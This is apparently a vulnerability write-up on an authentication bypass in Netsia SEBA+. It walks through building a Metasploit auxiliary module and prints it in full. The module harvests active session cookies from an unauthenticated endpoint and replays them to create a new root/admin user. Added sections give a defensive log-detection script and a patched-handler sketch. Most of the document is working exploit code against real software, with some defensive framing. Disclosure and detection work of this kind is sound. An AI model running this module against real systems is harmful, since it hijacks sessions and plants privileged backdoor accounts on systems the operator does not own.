This post walks through an example analysis of the Netsia SEBA+ authentication bypass vulnerability and the Metasploit auxiliary module written for it. Most readers will not yet be familiar with the issue, so the write-up is shared here for reference.
Unfortunately, since I do not have access to the product's source code, I cannot describe the root cause of the vulnerability in detail.
In the application, the HTTP request behind the "Active Sessions" section, which is meant to be accessible only to root/admin users, can be performed without any session (cookie) information. As a result, the session cookies of the application's active users can be read straight out of the response.

Note that similar requests cannot be sent elsewhere in the application; in other words, only the "Active Sessions" request can be issued without session information.
By issuing a "GET /session/list/allActiveSession" request, we obtain the cookie values of authorized users from the session information returned in the response.

At this point we hold a cookie value, but the session may end at any moment. The best attack vector is therefore to create a new user.

So we can add a new root user to the application by sending the required data in a "POST /authentication-server/user/add" request.
In the attack shown in the figure above, once the cookie value of a logged-in user has been obtained, an unauthorized attacker can create a new user with full privileges by placing that cookie value in the user-add request, as shown in the figure below:

As the figure shows, the HTTP response indicates that the requested user was added successfully. The attacker can later log in to the application with this fully privileged user and perform any other operation.
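The attack chain described above (an unauthenticated GET to the session list, then a POST to the user-add endpoint carrying a harvested cookie) leaves a recognisable footprint in front-end proxy logs. The following Ruby script is an added example, not part of the original write-up or of Netsia's product. It parses constructed log lines in a hypothetical reverse-proxy format (timestamp, client IP, method, path, status, and whether a SESSION cookie was present; ordinary access logs rarely record cookie presence, so that field would have to be emitted by the proxy) and raises a medium alert for any session listing served without a cookie, escalating to high when the same client then succeeds at POST /authentication-server/user/add within ten minutes.

```ruby
require 'time'

# Constructed sample lines in a hypothetical reverse-proxy log format (this is
# not a real Netsia SEBA+ log format): timestamp, client IP, method, path,
# status, and whether the request carried a SESSION cookie.
SAMPLE_LOG = <<~LOG
  2021-01-06T10:00:01Z 203.0.113.10 GET /session/list/allActiveSession 200 session_cookie=no
  2021-01-06T10:00:05Z 203.0.113.10 POST /authentication-server/user/add 200 session_cookie=yes
  2021-01-06T10:01:00Z 198.51.100.7 GET /session/list/allActiveSession 200 session_cookie=yes
  2021-01-06T10:02:00Z 198.51.100.7 GET /home/dashboard 200 session_cookie=yes
  2021-01-06T10:03:00Z 192.0.2.44 GET /session/list/allActiveSession 200 session_cookie=no
LOG

SESSION_LIST_PATH = '/session/list/allActiveSession'
USER_ADD_PATH     = '/authentication-server/user/add'
WINDOW_SECONDS    = 600 # how long after the listing a user/add still counts as correlated

LogEntry = Struct.new(:time, :ip, :verb, :path, :status, :has_cookie)

# Parse one log line into a LogEntry; returns nil for lines that do not match.
def parse_line(line)
  m = line.match(/^(\S+) (\S+) (\S+) (\S+) (\d{3}) session_cookie=(yes|no)$/)
  return nil unless m
  LogEntry.new(Time.iso8601(m[1]), m[2], m[3], m[4], m[5].to_i, m[6] == 'yes')
end

# Walk the log per client and produce alerts as hashes with
# :severity, :ip, :time and :reason.
def detect(log_text)
  entries = log_text.each_line.map { |l| parse_line(l.strip) }.compact
  alerts = []
  entries.group_by(&:ip).each do |ip, reqs|
    reqs = reqs.sort_by(&:time)
    unauth_list = reqs.select { |r| r.path == SESSION_LIST_PATH && !r.has_cookie && r.status == 200 }
    next if unauth_list.empty?
    first = unauth_list.first
    # A 200 from the session-listing endpoint with no cookie is itself a finding:
    # on a patched system this request should be rejected.
    alerts << { severity: :medium, ip: ip, time: first.time,
                reason: 'session list served without a session cookie' }
    # Escalate when the same client then creates a user with a successful POST.
    reqs.each do |r|
      next unless r.verb == 'POST' && r.path == USER_ADD_PATH && r.status == 200
      next unless r.time >= first.time && r.time - first.time <= WINDOW_SECONDS
      alerts << { severity: :high, ip: ip, time: r.time,
                  reason: 'user/add succeeded shortly after unauthenticated session listing' }
    end
  end
  alerts
end

if __FILE__ == $0
  detect(SAMPLE_LOG).each do |a|
    puts "#{a[:severity].to_s.upcase} #{a[:ip]} #{a[:time].utc.iso8601}: #{a[:reason]}"
  end
end
```

On the constructed sample, 203.0.113.10 produces one medium and one high alert, 198.51.100.7 (an admin listing sessions with a valid cookie) produces nothing, and 192.0.2.44 produces only the medium alert.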
The Metasploit Framework includes hundreds of auxiliary modules for scanning, fuzzing (vulnerability checks), sniffing and so on. Although these modules will not give you a shell, they are very valuable during a penetration test. "show auxiliary" lists all of them:

Exploit modules are usually written to execute commands on a system, whereas MSF auxiliary modules suit various common vulnerability classes, such as gathering information from a target host or using an existing vulnerability on the target to build a new attack vector.

We can therefore implement the exploit for this vulnerability as an MSF auxiliary module.
```ruby
class MetasploitModule < Msf::Auxiliary
```
No payload is generated here, because we did not choose Msf::Exploit::Remote.

Next, we register the username and password as module options. Rex::Text.rand_text_alphanumeric() generates a random default password value, which is convenient for the exploit.
```ruby
register_options(
  [
    Opt::RPORT(443),
    OptString.new('USERNAME', [true, 'The username for your new account']),
    OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
  ])
```
Next, we request "/session/list/allActiveSession" and inspect the response. If the response contains "sessionId", an active session exists. If there is no "sessionId" but the response contains "SUCCESS", the application is vulnerable but no session is currently active.
```ruby
def check
  begin
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
    )
  rescue
    return Exploit::CheckCode::Unknown
  end

  if res.code == 200 and res.body.include? 'sessionId'
    return Exploit::CheckCode::Vulnerable
  else
    if res.code == 200 and res.body.include? 'SUCCESS'
      print_status("Target is vulnerable! But active admin session was not found. Try again later.")
      return Exploit::CheckCode::Appears
    end
  end
  return Exploit::CheckCode::Safe
end
```
The check method above is enough to gate the process; we do not need the auxiliary module to run unnecessary steps, because if the target is not vulnerable, doing anything further is pointless.
```ruby
unless Exploit::CheckCode::Vulnerable == check
  fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
```
Now we can start writing the exploit code.

First, we need to know how many active sessions exist in the Netsia SEBA+ application. Several users may be active, some of them without authorization, and we need the active user with the highest privileges for the attack. I therefore decided to create a separate counting method.
```ruby
def count_user(data, find_string)
  data.scan(/(?=#{find_string})/).count
end
```
We pass the HTTP response as the data and search for the string "sessionId". The number of "sessionId" occurrences in the response then equals the number of active users; later we also need to extract those sessionId values.
```ruby
res = send_request_cgi(
  'method' => 'GET',
  'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
sescount = count_user(res.body, '"name"')
print_good("Currently #{sescount} active sessions have been detected.")
```
That completes the first step; next we extract the sessionId values.

The part between "sessionId":" and ","action is the sessionId value in the response, so we can use scan() with the regular expression ([\S\s]*?) to capture it.
```ruby
cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
```
Here cookies[0] is the first user's sessionId and cookies[1] the second user's; the index increases by one each time.

Now we apply a very simple vector for the exploit.

We send a user-creation request with each of the active cookie values in turn; whichever of those cookies is authorized will create the new user we want in the user database.

I chose a while loop here. For example, with 7 active users, the loop increments the index into cookies[int] by one on every iteration and issues each possible request.
```ruby
while $i <= sescount do
  sessloop = cookies[$i]
  sessid = "SESSION=" + sessloop.to_s
  cookie = sessid.split('"]').join('').split('["').join('')
  $i += 1
  json_data = [........]
  res = send_request_raw({
    'method' => 'POST',
    'ctype'  => 'application/json',
    'uri'    => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
    'cookie' => cookie,
    'data'   => json_data
  })
end
```
A loop like the one above is enough for this vector. Finally, we need to check whether the request succeeded.

If the desired user was created, the response says so and returns the newly created user's information.
```ruby
if res.code == 200 and res.body.include? '"SUCCESS"'
  print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
  print_good("Username : #{datastore["USERNAME"]}")
  print_good("Password : #{datastore["PASSWORD"]}")
  break
end
```
The auxiliary module is now complete; here is everything put together:
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User',
      'Description'    => %q{
        This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
        HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
        can be performed without the need for any session(cookie) information. Therefore, the session
        cookie informations of the active users in the application can be read from the response content.
        A new authorized user can be created with the obtained cookie.
      },
      'References'     =>
        [
          [ 'CVE', '' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
          [ 'URL', 'https://www.netsia.com' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "2021-01-06",
      'DefaultOptions' => { 'SSL' => true }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'The username for your new account']),
        OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
      ])
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def check
    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
      )
    rescue
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and res.body.include? 'sessionId'
      return Exploit::CheckCode::Vulnerable
    else
      if res.code == 200 and res.body.include? 'SUCCESS'
        print_status("Target is vulnerable! But active admin session was not found. Try again later.")
        return Exploit::CheckCode::Appears
      end
    end
    return Exploit::CheckCode::Safe
  end

  def count_user(data, find_string)
    data.scan(/(?=#{find_string})/).count
  end

  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
    )
    sescount = count_user(res.body, '"name"')
    print_good("Currently #{sescount} active sessions have been detected.")
    cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
    puts cookies

    $i = 0
    while $i <= sescount do
      sessloop = cookies[$i]
      sessid = "SESSION=" + sessloop.to_s
      cookie = sessid.split('"]').join('').split('["').join('')
      $i += 1
      json_data = '{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}'
      res = send_request_raw({
        'method' => 'POST',
        'ctype'  => 'application/json',
        'uri'    => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
        'cookie' => cookie,
        'data'   => json_data
      })
      if res.code == 200 and res.body.include? '"SUCCESS"'
        print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
        print_good("Username : #{datastore["USERNAME"]}")
        print_good("Password : #{datastore["PASSWORD"]}")
        break
      end
    end
  end
end
```
Now we can run the auxiliary module against the vulnerable application:

Netsia has since fixed the vulnerability: the request can no longer be sent without an authorized cookie, and even as an authorized admin user you will see that the session cookies are filtered out of the response.
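To make the two parts of that fix concrete, here is an added Ruby sketch (not Netsia's code; the in-memory session store, field names and role names are constructed for illustration) of a session-listing handler in the vulnerable shape described above, next to a hardened shape that matches the vendor's fix: the hardened handler rejects requests without a valid session cookie, requires an administrative role, and omits sessionId from the response so that even an authorized admin cannot harvest other users' cookies.

```ruby
require 'json'

# Constructed in-memory session store standing in for the application's
# session backend (hypothetical; not Netsia's real data model). Keys are the
# session identifiers that end up in the SESSION cookie.
SESSIONS = {
  'a1b2c3-admin-session'  => { 'name' => 'admin',  'role' => 'root',    'action' => 'login' },
  'd4e5f6-viewer-session' => { 'name' => 'viewer', 'role' => 'default', 'action' => 'login' }
}.freeze

# Minimal stand-in for an inbound HTTP request: path plus parsed cookies.
Request = Struct.new(:path, :cookies)

# Vulnerable shape: the handler trusts the route alone and returns every
# session record, sessionId included, to whoever asks. This is what lets an
# unauthenticated caller read other users' cookies out of the response.
def list_sessions_vulnerable(_req, sessions = SESSIONS)
  body = sessions.map { |id, s| s.merge('sessionId' => id) }
  [200, { 'status' => 'SUCCESS', 'data' => body }.to_json]
end

# Hardened shape: resolve the caller's own session from the cookie, require an
# administrative role, and never echo session identifiers back.
def list_sessions_fixed(req, sessions = SESSIONS)
  caller_session = sessions[req.cookies['SESSION']]
  return [401, { 'status' => 'UNAUTHORIZED' }.to_json] if caller_session.nil?
  return [403, { 'status' => 'FORBIDDEN' }.to_json] unless caller_session['role'] == 'root'

  body = sessions.map do |_id, s|
    # Keep only display fields; the identifier stays server-side.
    { 'name' => s['name'], 'role' => s['role'], 'action' => s['action'] }
  end
  [200, { 'status' => 'SUCCESS', 'data' => body }.to_json]
end

# Regression check a defender can keep in a test suite: does a response body
# contain any live session identifier?
def leaks_session_id?(body, sessions = SESSIONS)
  sessions.keys.any? { |id| body.include?(id) }
end

if __FILE__ == $0
  anon  = Request.new('/session/list/allActiveSession', {})
  admin = Request.new('/session/list/allActiveSession', { 'SESSION' => 'a1b2c3-admin-session' })
  [['vulnerable/anon', list_sessions_vulnerable(anon)],
   ['fixed/anon',      list_sessions_fixed(anon)],
   ['fixed/admin',     list_sessions_fixed(admin)]].each do |label, (status, body)|
    puts "#{label}: HTTP #{status}, leaks sessionId? #{leaks_session_id?(body)}"
  end
end
```

The vulnerable handler answers an anonymous request with HTTP 200 and a body containing both session identifiers; the hardened one answers 401 for anonymous callers, 403 for a non-admin session, and 200 with no identifiers for an admin, which is exactly the "cookies filtered out" behaviour the post reports after the patch.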